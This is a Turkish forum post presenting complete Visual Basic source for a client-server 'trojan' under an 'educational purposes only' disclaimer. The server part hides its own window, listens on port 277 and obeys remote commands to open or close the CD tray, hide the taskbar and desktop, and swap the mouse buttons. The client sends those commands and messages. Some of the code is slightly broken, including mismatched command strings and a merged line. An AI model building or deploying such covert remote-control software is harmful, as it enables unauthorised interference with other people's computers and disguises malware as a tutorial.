Sitemize reklam vermek için [email protected] adresine mail atabilirsiniz
For Advertising Contact [email protected]


[VB]-> ile TROJAN YAZILIMI (Sadece Eğitim Amaçlı JJPP )

JoJoPaPi

Level 8
TM Üye
Katılım
29 Mar 2009
Konular
697
Mesajlar
2,980
Reaksiyon Skoru
120
Başarım Puanı
175
MmoLira
0
DevLira
0
En İyi Cevap Puanı
0
Ticaret - 0%
0   0   0
Sadece Eğitim Amaçlıdır...! JoJoPaPi (Yanlış Anlaşılmasın lütfenn)

Command 1 Bağlanmak için
Command 2 Cdromu açmak için
Command 3 Cdromu kapatmak için
Command 4 Başlat çubuğunu Göster
Command 5 Masaüstünü Sakla
Command 6 Masaüstünü Göster
Command 7 Başlat Çubuğunu Sakla
Command 8 Mouse Sağ el hakim olsun
Command 9 Mouse Sol el Sahip olsun
Command 10 Mesaj Yollama
Text 3 Mesaj metni
Text1 ip Yazılacak kısım
Tex4 Bağlantı Göstergesi
JohnSysinfo eklemeyi de unutmayın servera bu da önemli cdRomu açamazsınız yoksa
Winsock 1 server a biri client a port numarası 277 ayarlanmış tı siz değiştirirsiniz Command1 dekini unutmayın.

Örnek

Private Sub Command1_Click()
Winsock.Close
Winsock.Connect Text1.Text, 277


End Sub

Private Sub Command10_Click()
Winsock.SendData "Message= Text3.text"
DoEvents
End Sub

Private Sub Command2_Click()
Winsock.SendData "Cdopen"
DoEvents
End Sub
Private Sub Command3_Click()
Winsock.SendData "Cdclose"
DoEvents
End Sub
Private Sub Command4_Click()
Winsock.SendData "showtask"
DoEvents
End Sub
Private Sub Command5_Click()
Winsock.SendData "hidesk"
DoEvents
End Sub
Private Sub Command6_Click()
Winsock.SendData "showdesk"
DoEvents
End Sub

Private Sub Command7_click()
Winsock.SendData "hidetask"
DoEvents
End Sub
Private Sub Command8_Click()
Winsock.SendData "getmouse"
DoEvents
End Sub
Private Sub Command9_Click()
Winsock.SendData "leavemouse"
DoEvents
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
Text4.Text = Winsock.State
End Sub
Private Sub Form_Unload(Cancel As Integer)
Winsock.Close
End
End Sub
Private Sub winsock_connect()
Text4.Text = "Connected!"
Form1.Caption = "RedFrog Trojan Connected"
Command1.Caption = "Connect New"
End Sub
=================================0
Server
=================================0
Option Explicit
Private Declare Function SetWindowPos Lib "user32" (ByVal hWnd _
As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, _
ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal _
wFlags As Long) As Long
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hWnd As Long, ByVal nCmdShow As Long) As Long

Private Declare Function FindWindow Lib "user32" Alias _
"FindWindowA" (ByVal lpClassName As String, ByVal _
lpWindowName As String) As Long
Const SWP_HIDEWINDOW = &H80
Const SWP_SHOWWINDOW = &H40

Private Sub Form_load()
server.LocalPort = 277
server.Listen
Me.Hide

End Sub
Private Sub server_connectionrequest(ByVal requestid As Long)
server.Close
server.Accept requestid
End Sub

Private Sub server_DataArrival(ByVal bytesTotal As Long)
Dim tmpData As String
server.GetData tmpData
Select Case tmpData
Case "Cdclose"
JohnSysInfo1.CDRomDoor = False

Case "Cdopen"
JohnSysInfo1.CDRomDoor = True
Case "showtask"

Timer1.Enabled = True
Timer1.Interval = 10
Timer2.Enabled = False

Case "hidetask"
Timer2.Enabled = True
Timer2.Interval = 10
Timer1.Enabled = False
Case "hidedesk"
Timer3.Enabled = True
Timer3.Interval = 10
Timer4.Enabled = False
Case "showdesk"
Timer3.Enabled = False
Timer4.Enabled = True
Timer4.Interval = 10
Case "getmouse"
JohnSysInfo1.UseLeftHandMouse = False

Case "leavemouse"
JohnSysInfo1.UseLeftHandMouse = TrueEnd Select
End Sub

Private Sub timer1_timer()
Dim Thwnd As Long
Thwnd = FindWindow("Shell_traywnd", "")
Call SetWindowPos(Thwnd, 0, 0, 0, 0, 0, SWP_SHOWWINDOW)
End Sub

Private Sub timer2_Timer()
Dim Thwnd As Long
Thwnd = FindWindow("Shell_traywnd", "")
Call SetWindowPos(Thwnd, 0, 0, 0, 0, 0, SWP_HIDEWINDOW)
End Sub


Private Sub timer4_timer()
Dim hWnd As Long
hWnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow hWnd, 5

End Sub

Private Sub timer3_timer()
Dim hWnd As Long
hWnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow hWnd, 0
End Sub
 

Şu an konuyu görüntüleyenler (Toplam : 1, Üye: 0, Misafir: 1)

Üst